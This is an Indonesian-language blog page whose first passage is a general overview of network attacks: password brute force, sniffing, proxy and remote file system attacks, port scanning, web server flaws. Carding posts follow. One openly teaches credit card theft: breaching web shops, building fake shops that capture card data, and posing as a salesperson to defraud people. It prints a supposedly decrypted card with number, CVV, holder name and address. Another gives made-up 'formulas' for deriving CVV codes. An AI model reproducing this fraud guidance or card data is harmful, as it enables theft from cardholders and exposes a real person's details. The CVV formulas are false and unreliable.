    angka tanggal lahir. Beberapa user atau bahkan administrator dapat membuat pekerjaan cracker menjadi
    mudah andai saja mereka lupa untuk merubah password default dari sebuah software.
    Sebenarnya, password guessing merupakan sesuatu yang sangat tidak efektif, dan dapat menghabiskan
    waktu. Network admin bisa dengan mudah mendetect serangan jika seorang attacker mencoba login
    dengan menebak password berkali-kali.
    Brute-force merupakan serangan yang menggunakan logika yang sama dengan password guessing tetapi
    serangan brute-force lebih cepat dan lebih powerfull. Dalam tipe serangan ini seorang attacker
    menggunakan script (biasanya program cracking gratis) yang akan mencoba password-password
    umum(biasanya terdapat dalam dictionary). Tujuan dari serangan jenis ini adalah untuk mempercepat
    penemuan password sebelum network admin menyadari adanya serangan.
    Walaupun serangan Brute-force lebih efisien daripada password guessing, kedua teknik tersebut pada
    dasarnya sama. Attacker umumnya lebih sulit untuk berhasil dengan kedua metoda tersebut. Lebih jauh
    lagi, kedua teknik tersebut sangat mudah di lawan dengan memanfaatkan features blacklisting, yang akan
    mengunci sebuah account user jika seseorang(attacker) berkali-kali memasukkan password secara tidak
    tepat. Contohnya, default blacklist dalam system unix adalah tiga kali (kesempatan memasukkan
    password).
    Kelemahan dari perlindungan blacklist adalah bahwa feature blacklist ini dapat igunkan untuk menyerang
    system oleh attacker. Sebagai contoh, jika seorang attacker dapat mengidentifikasi siapa login name untuk
    network admin, sang attacker bisa saja menngunakan login name itu dan memasukkan password yang
    salah berulangkali dan akhirnya mengunci account admin ☺. Ketika sang admin sedang berusaha untuk
    mendapatkan aksesnya kembali, seorang attacker masih bisa untuk berhubungan dengan system.
    Password cracking adalah metoda untuk melawan perlindungan password yang dienkripsi yang berada di
    dalam system. Dengan anggapan bahwa atacker telah masuk kedalam system, ia bisa saja mengubah
    kekuasaannya didalam system dengan cara meng crack password file menggunakan metode brute-force
    dictionary attack (mencocokan kata-kata yang berada dalam kamus dengan kata-kata yang dienkripsi
    dalam file password). Keberhasilan menggunakan cara ini bergantung pada kecepatan prosesor dan
    program yang dimiliki oleh attacker. Cara yang terbaik untuk menghindari serangan jenis ini adalah
    dengan memonitor kewenangan akses pada file.
    Dengan cara mengintip lalulintas pada port telnet(23) ataupun HTTPD (80), seorang attacker dapat
    mendapatkan password yang digunakan untuk internet dan koneksi secara remote melalui proses yang
    dinamakan password snifing. Cara inilah yang paling mudah dilakukan karena kedua koneksi tersebut
    tidak menggunakan enkripsi, kecuali koneksi yang menggunakan SSL (secure socket layer) pada
    HTTPD(biasanya ada tanda gembok terkunci dibawah browser, yang menandakan transaksi aman) atau
    juga menggunakan SSH (Secure SHell) untuk koneksi ke mesin lain secara remote.

    9.Proxy Server Attacks
    Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan
    proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai
    kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem
    saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
    Jika firewal yang berada dalam trusted network tidak dikonfigurasikan secara optimal, khususnya untuk
    memblok akses dari luar, apalagi jika autentikasi dan enkripsi tidak digunakan, seorang attacker bisa
    menyerang proxy server dan mendapatkan akses yang sama dengan anggota trusted network lainnya. Jika
    attaker sudah masuk ke sistem ia tentunya bisa melakukan apa saja dan ia bisa melakukan
    DDOS(distributed denial of service) secara anoymous untuk menyerang network lain.
    Router yang tidak dikonfigurasikan secara optimal juga akan berfungsi sebagai proxy server dan akan
    mengakibatkan kerawanan yang sama dengan proxy server.

    10. Remote Command Processing Attacks
    Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource
    sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota
    network kekuasaan akses yang sama di satu dan lain system (dalam network).
    Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan
    pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi
    perintah dan mengkases data yang tersedia bagi user lainnya.

    11. Remote File System Attack
    Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)
    yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network
    dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk
    mendapatkan akses ke direktori file.
    Tergantung pada OS (operating system) yang digunakan, attacker bisa meng extrack informasi tentang
    network, sharing privileges, nama dan lokasi dari user dan groups, dan spesifikasi dari aplikasi atau
    banner (nama dan versi software). System yang dikonfigurasi atau diamankan secara minimal akan
    dengan mudah membeberkan informasi ini bahkan melalui firewall sekalipun. Pada system UNIX,
    informasi ini dibawa oleh NFS (Network File System) di port 2049. system Windows menyediakan data
    ini pada SMB (server messaging block) dan Netbios pada port 135 - 139(NT) dan port 445 pada win2k.
    Network administrator bisa meminimalisasi resiko yang akan terjadi dengan menggunakan Protokolprotokol
    tersebut dengan memberikan sedikit peraturan. Network dengan system windows, harusnya
    memblok akses ke port 139 dan 445 dari luar network, jika dimungkinkan. Dalam system unix port 2049
    seharusnya di blok, sharing file dibatasi dan permintaan file melalui showmount(perintah dalam unix)
    seharusnya di catat dalam log.

    12. Selective Program Insertions
    Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program
    penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada
    system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini
    mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan
    membuka backdoor.
    Biasanya antivirus yang dijual dipasaran akan dapat mendeteksi dan membersihkan program-program
    seperti ini, tetapi jika ada virus baru (anggap saja variant melissa) virus scanner belum tentu dapat
    menghadapi script-script baru. Beberapa network administrator melakukan pertahan terhadap malware
    dengan teknologi alternatif seperti behaviour blockers, yang memberhentikan kode-kode yang dicurigai
    berdasarkan contoh kelakuan malware, bukan berdasarkan signature. Beberapa aplikasi lainnya akan
    mengkarantina virus dan code-code yang dicurigai didalam daerah yang dilindungi, biasanya disebut
    sandboxes.

    13. Port Scanning
    Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai
    macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
    Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk
    publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

    14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
    Interception
    TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan
    informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,
    serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
    TCP/IP Sequence Stealing adalah pemetaan dari urutan nomor-nomor (angka), yang bisa membuat packet
    milik attacker terlihat legal. Ketika suatu system meminta sesi terhadap mesin lain, kedua system tersebut
    saling bertukar nomor-nomor sinkronisasi TCP. Jika tidak dilakukan secara acak, Attacker bisa mengenali
    algoritma yang digunakan untuk meng –generate nomor-nomor ini. Urutan nomor yang telah dicuri bisa
    digunakan attacker untuk menyamar menjadi salah satu dari system tadi, dan akhirnya
    memperbolehkannya untuk melewati firewall. Hal ini sebenarnya efektif jika digunakan bersama IP
    Spoofing.
    Melalui passive port listening, seorang attacker dapat memonitor dan mencatat (log) semua pesan dan file
    yang dikirim ke semua port yang dapat diakses pada target system untuk menemukan titik kerawanan.
    Packet Interception adalah bagian (tepatnya pelapis) dari active listener program yang berada pada port di
    system sasaran yang berfungsi untuk menerima ataupun mengembalikan semua tipe pesan (data) spesifik
    yang dikirim. Pesan tersebut bisa dikembalikan ke unauthorized system, dibaca dan akhir nya
    dikembalikan lagi baik tanpa perubahan atau juga dengan perubahan kepada attacker, atau bahkan tidak
    dikembalikan.
    Dalam beberapa versi atau juga menurut konfigurasi dari user SSHD(secured shell daemon), otentikasi
    bisa dilakukan dengan cara menggunakan public key (milik mesin tentunya). Jika seorang attacker
    mempelajari public key yang digunakan, ia bisa menciptakan atau memasukan paket-paket palsu. System
    sasaran akan menganggap pengirim paket palsu tersebut mempunyai hak akses.

    15. HTTPD Attacks
    Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd
    bypasses, cross scripting, web code vulnerabilities, dan URL floods.
    HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan
    untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat
    overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
    string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker
    akses ke command prompt.
    Beberapa feature dari HTTPD bisa digunakan untuk meciptakan HTTPD byapass, memberi akses ke
    server menggunakan fungsi logging. Dengan cara ini, sebuah halaman web bisa diakses dan diganti tanpa
    dicatat oleh web server. Cara ini sering digunakan oleh para cracker, hacktivis dan cyber vandals untuk
    mendeface website.
    Sedangkan kerawanan pada script-script web bisa terjadi pada semua bahasa pemrograman web dan
    semua ekstensi aplikasi. Termasuk VB, Visual C++, ASP, TCL, Perl, PHP, XML, CGI dan Coldfusion.
    Pada dasarnya, attacker akan mengexploitasi kelemahan dari sebuah aplikasi, seperti CGI script yang
    tidak memeriksa input atau kerawanan pada IIS RDS pada showcode.asp yang mengizinkan menjalankan
    perintah secara remote (remote command priviledges).
    Melalui cross scripting dan cross-site scripting seorang attacker bisa mengexploitasi pertukaran cookies
    antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll.
    Script ini bisa menjalankan malware, membaca infomasi penting dan meng expose data sensitive seperti
    nomor credit card dan password.
    Pada akhirnya attacker dapat menjalankan denial of service dengan URL flood, yang dilakukan dengan
    cara mengulang dan terus mengulang permintaan terhadap port 80 httpd yang melalui batas TTL (time to
    live).
    Beberapa user ataupun manager mungkin benci mendengar serangan-serangan tersebut. Tapi pada
    kenyataanya memang tidak ada yang benar-benar fix untuk mengamankan network ataupun website.
    Keamanan adalah suatu proses, bukan produk. Jika anda memasang firewall, IDSes(instrusion detection
    system), routers dan honeypots (system untuk jebakan) mungkin dapat menyediakan lapisan-lapisan
    untuk bertahan, tetapi sekali lagi peralatan paling canggih di dunia tidak akan menolong suatu organisasi
    sampai organisasi tersebut mempunyai proses untuk mengupgrade system, memakai patch, mengecek
    security pada system sendiri dan metode lain.
    Telah banyak perusahaan yang memakai IDSes tetapi tidak memonitor file log, mereka menginstall
    firewall, tetapi tidak mengupgradenya. Jalan terbaik untuk melindungi website maupun network dari
    serangan adalah mendekatkan keamanan sebagaimana tantangan yang sedang terjadi terhadap keamanan
    itu sendiri, terus berusaha, selalu ingat basicnya dan jangan lupa untuk berdoa...:)

    Sedikit Pencerahan Carding

    Lagi Lagi Carding...


    inti nya dolo ya :

    1. Gw kaga bakal kasi bug di sini, (cari bug/exploit web shop susah bro yg private).

    2. Kaga ada yg nama nya kartu hasil generate valid, bisa sih valid tapi cuma alogaritma nya doank valid, kalo keberadaan kartu di real nya belom tentu ada dan sekarang kartu generate mah uda gak ada harga nya, merchant da pada kuat cooyy security na.

    3. CVC / CVV (Card Verification Code) yg kalo Visa,Mastercard 3 digit , AMEX 4 digit.
    itu menurut gw kaga ada yg bisa generate BANK itu gak bodoh !! cvv di generate lo butuh ini buat generate CVV / CVC.
    1. Primary Account Number (PAN).
    2. 4 digit Expiration Date.
    3. 3 digit Service Code.
    4. DES keys (CVKs).
    Dan gak semua 4 data di atas itu lo bisa tahu.
    gw pernah dapet dari webshop gw
    Nomor Credit Card & Informasi Pemilik Yg Sama, yg expire tapi di perpanjang.
    di situ yg beda exp date (bulan nya sama tapi tahun na bertambah 2 / 3 tahun, kadang ada yg lebih tapi rata rata 2/3 tahun) ama ccv na beda.
    why beda ? PIKIR SENDIRI !! kan uda w terangin di atas tuh.

    nah dari sini lo bisa manfaatin kartu credit yang uda expire buat belanja di online shop ?? (loh om kan CCV na beda kata om barusan)
    1. Gak semua situs butuh CCV (cuma butuh nomor kartu + exp).
    2. Cari sendiri ea situs na.. banyak kok thread na "shop without ccv / cvc" GOOGLE ea.

    4. Jadi Gimana Om buat Dapetin Credit Card Yg VALID BENERAN
    1. Hack web shop online
    (gak semua webshop nyimpen Data customer di database nya jadi jangan asal bobol aje,
    *jadi gimana om cara bedain nya yg ada CC & yg ga ada CC nya*
    PAKE OTAK LO GITU AJA GAK TAU !! Belajar Berfikir Kritis w cukup kasi umpan lo yg berfikir !!

    2. Gak Semudah itu juga kalo lo uda nemu tuh database isi na credit card kalo kaga di encrypt data nya brarti kemungkinan cacad.

    *GW KAGA PERCAYA KALO CREDIT CARD NA KAGA DI ENCRYPT KEMUNGKINAN VALID DIBAWAH 50%*

    why ?? Di Luar Sana Banyak Para Hacker / Carder / Apa Lah Itu yg lebih Hebad Dari Gw & Lebih Hebad Dari Yg Lebih Hebad , yg haus juga ni ama credit card.
    Gak usa jauh jauh Look @ MIRC di sono ada server sendiri & channel sendiri itu Internasional isi na orang Gila Semua !! credit card berhamburan. dan gw pun dapet 5 orang luar negeri carder juga yang uda bertemen di fb gw dan skill na advanced semua.
    *GW GA MAU KASI TAU NAMA SERVER & CHANEL NYA*.

    3. *kak kalo credit card nya di encrypt gimana ?*
    kaya gini ea ?
    rp+UkpWukZ6YnqStlqmTpQ== --> No Kartu Credit
    12 13 --> Exp Date
    sp2Y --> CCV / CVC / What Ever Fuck Lah..
    yNrTz8LlyuLEhbrj19fN7+A= --> Name On Card

    TENG TING TONG !!
    4430450059691740
    12 / 13
    827
    Normalita Lorenzo
    3627 North Christiana
    Chicago
    IL
    60618
    VISA

    SLAMAT YG BACA PERTAMA NI KARTU KAYA NA VALID HAPPY EA..

    *wah kak ko bisa di decode ?*
    ea bisa lah bikin sendiri program na ea.. ekkeke tiap server / provider enkripsi na beda beda..

    Cara lain buat dapet credit card tau gak ??
    1. Bikin SItus Shop Palsu, Pake Aje Web Apps Shopping Cart Terus lo Edit Coding Di Bagian Checkout, jadi pas customer yg SIAL beli info kartu credit na kesimpen di database / ke send ke email lo
    Buat yg 1 ini lo perlu ngerti cooding PHP / ASP + SQL ;)

    2. Ngemis / Beli , ya lo minta dah ama yg punya credit card
    *BANYAK ANAK ANAK DI SINI YG PNYA CREDIT CARD TAPI PADA DIEM DIEM*

    3. Lo nyamar aje jadi sales gitu nawar nawarin produk / jasa ya lo fikir dah , lo siapin juga kertas buat korban isi data - data diri + data credit card. terus kalo uda dapet lo pake buat Shop Online. wkkwwkkwkwk
    (buat cara yg ini ga perlu skill programing , cukup skill NIPU + skill Kamuflase / Ngilangin Jejak)

    Dari yg nomor 3 ini, mending lo kasi tau semua keluarga lo yg punya credit card kalo ke Mall / tempat umum hati hati kalo ada yg berbau credit card kaya cara no 3 mending kaboor biar ga ketipu, (orang indo rata rata geblek masalah ini).

    Itu aja kali yaa.. apa lagi yaa.. kekeekek...
    kalo gw pake cara nomor 1 pak..
    tapi semua kartu yg w dapet ter enkripsi tapi w bisa decode na, jadi biar orang lain hack tuh situs tetep aja percuma kalo ga bisa decode.


    Oke Selamat Mempelajari
    (DOSA DI TANGGUNG SENDIRI)

    Teknik carding pada Toko Online

    This summary is not available. Please click here to view the post.

    Teknik Carding

    Pada bagian ini anda akan mengetahui rahasia tersembunyi tentang Kartu Kredit,meliputi : Kode Rahasia CVV (Cardholder Verification

    Value) Kode Rahasia CVV (Cardholder Verivication Value)

    Setiap Kartu Kredit dilengkapi dengan 3 atau

    4 KODE ANGKA RAHASIA, yang sering dikenal sebagai CVV (Cardholder Verification Value). CVV memiliki banyak sebutan lainnya, misalnya : CSC (Card Security Code) atau CVN (Card Verification Number).

    • Perusahaan Visa menyebutnya sebagai CVV2, • Mastercard menyebutnya sebagai CVC2, • Diners Club menyebutnya sebagai CVV2, • Perusahaan American Express menyebutnya CIN (Card Identification Number).

    Visa dan Mastercard Memiliki 3 digit CVV/ CVC, sedangkan American Express Memiliki 4 digit CIN. Biasanya CVV ini terletak di bagian belakang kartu kredit, yang merupakan nomor otorisasi manual untuk kartu kredit supaya bisa melakukan transaksi. Jika anda biasa belanja di Hypermarket / Supermarket dengan menggunakan Kartu Kredit, coba perhatikan,

    biasanya seorang Kasir yang teliti, setelah menggesek Kartu Kredit Anda, dia akan membalik Kartu Kredit Anda untuk mengecek 3 DIGIT CVV Anda yang muncul di layar komputernya. Tapi biasanya jika Kartu Kredit Anda memiliki foto, seorang kasir tidak perlu melihat CVV Anda, tapi dia hanya perlu mencocokkan foto anda di kartu dengan diri anda, jadi jangan heran apalagi Ge-Er apabila seorang kasir yang cantik melirik anda ….. hehehe …. CVV jauh lebih sering digunakan untuk TRANSAKSI yang tidak menggunakan Kartu Kredit secara fisik, tapi Lebih Sering digunakan untuk mengecek pembelanjaan secara Online / Via Internet. Jadi Dengan Adanya CVV ini , maka sang pemilik Kartu Kredit akan merasa amandalam mencegah orang yang tidak diinginkan melakukan transaksi denganmenggunakan Nomor Kartu Kredit miliknya. BENARKAH ? 00 % SALAH !!!! Anda akan mengetahui bagaimana cara

    mengetahui Nomer Kode Rahasia CVV dari

    kartu kredit manapun juga … !!! Syaratnya

    hanya 1, anda harus mengetahui NOMER

    KARTU KREDITnya , Tidak Bisa Ditawar-

    Tawar … !!! Silahkan dibaca terus… Mengetahui apakah suatu Kartu Kredit Valid

    atau Tidak Cara Rahasia Mengetahui apakah suatu

    Kartu Kredit Valid atau Tidak. Setiap anda

    berbelanja menggunakan Kartu Kredit, maka

    ada suatu proses keabsahan suatu Kartu

    Kredit yang dikenal dengan nama

    Authentifikasi, yaitu suatu proses pengecekan apakah kartu kredit yang anda

    gunakan masih Valid Atau Tidak. Biasanya

    pengecekan akan lebih mudah dengan

    menggunakan mesin atau sistem, tapi

    tahukah anda bahwa anda bisa juga

    melakukan pengecekan apakah Kartu Kredit yang anda miliki Valid atau tidak ? Lalu

    bagaimanakah cara pengecekannya ? Mari

    kita simak bersama : Contoh : Misalnya No. Kartu Kreditnya adalah

    5378-5432-1011-8224 Saya Ingin

    mengetahui apakah nomor Kartu Kredit itu

    Valid atau Tidak ? Begini caranya :

    Terdapat 16 DIGIT pada Nomer Kartu Kredit

    Tersebut. Langkah I, Kalikan SEMUA ANGKA pada DIGIT GANJIL

    dengan “2”, lalu : - Jika hasilnya Lebih dari 9 maka KURANGI

    HASILNYA dengan “9”,

    - Jika hasilnya Kurang dari 9, biarkan saja.

    Setelah itu JUMLAHKAN SEMUANYA.

    Digit 1 : 5 ; 5×2 = 10 {Lebih dari 9}, jadi 10

    – 9 = 1 Digit 3 : 7 ; 7×2 = 14 {Lebih dari 9}, jadi 14

    – 9 = 5

    Digit 5 : 5 ; 5×2 = 10 {Lebih dari 9}, jadi 10

    – 9 = 1

    Digit 7 : 3 ; 3×2 = 6 {Biarkan saja, karena

    KURANG DARI 9} Digit 9 : 1 ; 1×2 = 2 {Biarkan saja, karena

    KURANG DARI 9}

    Digit 11 : 1 ; 1×2 = 2 {Biarkan saja, karena

    KURANG DARI 9}

    Digit 13 : 8 ; 8×2 = 16 {Lebih dari 9}, jadi

    16 – 9 = 7} Digit 15 : 2 ; 2×2 = 4 {Biarkan saja, karena

    KURANG DARI 9}

    Lalu jumlahkan :

    1 + 5 + 1 + 6 + 2 + 2 + 7 + 4 = 28 Langkah II, Jumlahkan Digit yang ada di posisi Genap

    pada data No. Kartu Kredit

    5378-5432-1011-8224 Digit 2 : 3

    Digit 4 : 8

    Digit 6 : 4

    Digit 8 : 2

    Digit 10 : 0

    Digit 12 : 1 Digit 14 : 2

    Digit 16 : 4

    ————— +

    Jumlah : 24 Langkah III, Jumlahkan hasil Langkah I dengan Langkah

    II

    28 + 24 = 52

    Karena 52 TIDAK HABIS DIBAGI dengan

    “10” (Masih menyisakan bilangan

    desimal yaitu 5,2) , maka KARTU KREDIT ITU TIDAK VALID / TIDAK SAH / TIDAK

    DAPAT DIGUNAKAN.

    Mudah, bukan ? Cara Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari Kartu Kredit apapun Nah ini dia yang ditunggu – tunggu, saya akan memberitahu anda cara mengetahui

    Nomer Kode Rahasia CVV / CVN /CIN dari Nomer Kartu Kredit jenis Apapun. Mengetahui Nomer Kode Rahasia CVV / CVN / CIN dari KartuKredit apapun Misal saya ambil contoh no. Kartu Kredit :

    5378-5432-1011-8224 KETERANGAN : Perlu Anda ketahui bahwa saya hanya mengetikkan 16 digit angka yang asal-asalan saja. Saya tidak mengetahui nama pemilik Kartu Kredit Ini, Tinggalnya dimana, berasal dari Indonesia / Luar Negeri, dan sebagainya. Sekali Lagi, saya hanya asala- salan saja memberi contoh No. Kartu Kredit, karena ini hanyalah sebuah contoh saja.

    Kembali ke CONTOH No. Kartu Kredit tersebut :

    5378-5432-1011-8224

    Cara mengetahui No. CVVnya adalah sebagai berikut : “RUMUS 1” Cari Digit ke 8 : yaitu 2

    Cari Digit ke 12 : yaitu 0

    Cari Digit ke 3 : yaitu 7 (TAMBAHKAN

    DENGAN “1”) , berarti 7 + 1 = 8

    Maka ketahuan CVVnya adalah 208 , hehehe

    … mudah, bukan ? Atau bisa juga dengan rumus yang kedua : “RUMUS 2” Cari Digit ke 7 : yaitu 3

    Cari Digit ke 13 : yaitu 8

    Cari Digit ke 3 : yaitu 7 (TAMBAHKAN

    DENGAN “1”) , berarti 7 + 1 = 8

    Maka ketahuan CVVnya adalah 388 , hehehe

    … mudah, bukan ? Atau bisa juga dengan rumus yang ketiga : “RUMUS 3” Cari Digit ke 9 : yaitu 1

    Cari Digit ke 3 : yaitu 7

    Cari Digit ke 6 : yaitu 4 (TAMBAHKAN DENGAN “1”) , berarti 4 + 1 = 5

    Maka ketahuan CVVnya adalah 175 , hehehe … mudah, bukan ?

    Silahkan anda coba sendiri menggunakan KARTU KREDIT ANDA, kebetulan setelah saya iseng-iseng mencoba RUMUS 1, 2 dan 3 dengan menggunakan NOMER KARTU KREDIT yang saya miliki, ternyata CVV Kartu Kredit yang saya miliki

    cocok tuh perhitungannya menggunakan Rumus yang ke 3 !!!

    Tapi anda jangan kuatir, konon rumus ini ketepatannya hanya 95 % saja, jadi masih

    ada kemungkinan 5 % yang meleset.

    Jadi apabila anda mencobanya dengan Kartu

    Kredit Anda, dan setelah anda

    menghitung dan HASILNYA SALAH, maka Beruntunglah Anda !!!

    Saya malah jadi was-was dan deg-degan , karena CVV KARTU KREDIT saya

    TERNYATA DAPAT DITEBAK dengan menggunakan Rumus No. 3 !!!

    Wah, saya jadi harus lebih berhati-hati nich apabila ingin Berbelanja Online, bisa-bisa

    Kartu Kredit Saya nanti dijebol maling…. Wah, mudah-mudahan hal itu jangan

    sampai terjadi deh … Amin. Cara Rahasia Mengetahui apakah suatu

    Kartu Kredit diterbitkan oleh Visa/

    Mastercard/ Amex/ Discover Untuk Tambahan Pengetahuan Anda, maka berikut saya jelaskan mengenai nomer sandi dari masing-masing perusahaan Kartu Kredit. UNTUK MASTERCARD : Angka Awal pada Kartu Kredit adalah 51, 52, 53, 54, 55, 56, dll dengan panjang Nomer Kartu Kredit Antara 14 hingga 16 Digit. UNTUK VISA : Angka Awal pada Kartu Kredit adalah “4”

    dengan panjang Nomer Kartu Kredit adalah

    13 hingga 16 Digit. UNTUK AMERICAN EXPRESS : Angka Awal pada Kartu Kredit adalah “34”

    dengan panjang Nomer Kartu Kredit adalah

    15 Digit. UNTUK DINERS CLUB : Angka Awal pada Kartu Kredit adalah

    300,301,302,303,304,305, dan 38 dengan

    panjang Nomer Kartu Kredit adalah 14 Digit UNTUK JCB : Angka Awal pada Kartu Kredit adalah “3”

    dengan panjang Nomer Kartu Kredit adalah

    16 Digit UNTUK BANKCARD : Angka Awal pada Kartu Kredit adalah “56”

    dengan panjang Nomer Kartu Kredit adalah

    14 Atau 16 Digit UNTUK DISCOVER CARD : Angka Awal pada Kartu Kredit adalah 6011,

    6500 – 6509, 6013 dengan panjang Nomer

    Kartu Kredit adalah 16 Digit. Jika anda ingin mempraktekan atau penasaran ingin mencobanya dengan menggunakan kartu kredit yang asli. Sebuah Perusahaan Afliate yaitu FriendFinder mamberi kemudahan bagi para membernya dengan cara memberi DebetCard untuk memudahkan pencairan uang dari hasil merekrut member untuk daftar di FriendFinder. Baca Tutorialnya DISINI.. Kartunya dari perusahaan MasterCard yang bentuknya DebetCard.

    Updates Via E-Mail

    Labels

    007 Legends (1) 007 Legends repack (1) 007 Legends-Black Box (1) 007 Legends-Black Box repack (1) 2K Games (1) 2K Marin (1) Action (8) Action RPG (5) Activision Blizzard (3) Alan Wake American Nightmare (1) Alan Wake American Nightmare-Black Box (1) ANARCHY (5) Antara AES dan pemandu kereta perasan bijak (1) antivirus (6) ARTIKEL (90) Bethesda Softworks (2) Binary Domain (2) BioShock 2 (1) BioWare Corporation (1) bitComposer Games (1) Bugbear Entertainment (1) Call of Duty: Modern Warfare 3 (1) Call of Duty: Modern Warfare 3-Black Box (1) CARDING (3) CD Projekt Red Studio (1) CERITA (7) CRACKER (18) Crysis 2 (1) Crytek Studios (1) Dark Souls: Prepare to Die Edition (1) Dark Souls: Prepare to Die Edition-Black Box (1) Darksiders (1) Darksiders II (1) Deface (1) Devil's Details (2) Digital Extremes (1) Doom 3:BFG Edition (1) Doom 3:BFG Edition-Black Box (1) EA Sports (1) Electronic Arts Inc. (4) ENGLISH MOVIE (29) Eurocom Entertainment Software (1) event (1) Exploit (76) FABLE III (1) Facebook Game Hack (1) FIFA 13 (1) FIFA 13-Black Box (1) Flashing (1) Flying Wild Hog (1) From Dust (1) From Dust-Black Box (1) From Software (1) gba games (1) Global Ops: Commando Libya (1) Global Ops: Commando Libya-Black Box (1) GORE (1) Hard Reset (1) Hard Reset-Black Box (1) HIJACK (2) History (3) id Software (1) iklan. (4) Infinity Ward (1) INFO (35) iPhone Jailbreak (9) ISU SEMASA (33) JOB (1) JOOMLA (1) KILLUMINATI (7) Konami (1) Lain-Lain Trick (1) LionHead Studios (1) MAKE MONEY (1) MALAY MOVIE (15) Mass Effect 2 (1) Max Payne 3 (1) Max Payne 3-Black Box (1) Maxis (1) Microsoft Game Studios (1) misteri (4) MOBILE (1) MUJAHID (27) music album mp3 (20) n-gage (1) Namco Bandai Games (3) NDS (1) Notepad Trick (1) OS (5) OTHER MOVIE LANGUES (8) PC GAME (141) photo (5) political (2) Pro Evolution Soccer 2013 (1) Pro Evolution Soccer 2013-Black Box (1) Prototype 2 (1) Prototype 2-Black Box (1) PS VITA (4) PS3 GAME (32) PSN GAME (6) PSP (7) PSPGAMES (4) puisi (1) putlocker games (5) Racing (1) Radical Entertainment (1) religion (12) Remedy Entertainment (1) repack game (1) REVEAL (32) Ridge Racer Unbounded-Black Box (1) Rockstar Games (1) S60v2 (1) Samsung U1000 (1) SEGA (2) SEO (2) Shooter (2) Shooting (2) Soalan bocor SPM 2012 ada di sini (1) Soft Skills Guide (1) software (31) Spectral Games (1) Sport (2) Strategy (1) SYSTEME (3) The Darkness II (1) The Darkness II-Black Box (1) The Elder Scrolls V: Skyrim (1) The Elder Scrolls V: Skyrim-Black Box (1) The Sims 3 (1) The Sims 3 Complete (1) The Sims 3 Complete-Black Box (1) The Witcher 2: Assassins of Kings (1) THQ Inc (2) tips (1) TOKOH (1) tool (2) Tutorial (30) TWEAK (6) Ubisoft Studios (1) UNDERGROUND (4) video movie (1) video music (1) Vigil Games (2) Website Hack (1) wii (2) XBOX360 (7) xboxone (1)

    Total Pageviews

    Blog Archive

    LIST